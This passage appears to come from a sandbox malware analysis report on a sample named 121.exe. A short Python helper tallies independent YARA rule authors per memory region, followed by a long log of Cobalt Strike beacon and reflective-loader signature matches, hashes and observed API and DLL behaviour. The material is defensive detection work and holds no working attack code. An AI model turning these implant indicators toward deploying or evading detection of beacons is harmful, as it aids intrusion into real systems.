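    independently written rule families is stronger evidence than many
    rules from one source."""
    result = []
    for region, rules in summarise(text).items():
        if region is None:
            continue
        authors = {a for auth in rules.values() for a in auth}
        if len(authors) >= min_authors:
            result.append((region, len(rules), sorted(authors)))
    return sorted(result)


if __name__ == "__main__":
    for base, n_rules, authors in corroborated_regions(SAMPLE_ROWS):
        print(f"0x{base:08X}: {n_rules} rules, authors={authors}")
```

Run against the full row set above, both 0xA30000 and 0xCE0000 come out corroborated by every author bucket present, which is the basis for treating both in-memory images as beacon copies rather than a single match that might be a string coincidence.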
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF1268 CreateProcessWithLogonW,GetLastError
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A51928
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A55914
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A3916C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5AAB0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A51264
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5C397
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5239C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A40334
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A50374
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A4F5A8
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A39680
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5C680
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A3CE3C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5E600
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5B7B0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A5CFF0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00A46F38
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D001A8
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CEA280
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0D280
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0F200
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CEDA3C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0DBF0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0C3B0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF7B38
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CE9D6C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D06514
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D02528
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0B6B0
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF867C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D01E64
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D0CF97
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D02F9C
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00D00F74
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF0F34
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00CF0B70
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF3A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_00CF3A64
              Source: 121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\121.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 121.exeReversingLabs: Detection: 86%
              Source: C:\Users\user\Desktop\121.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: winhttp.dllJump to behavior
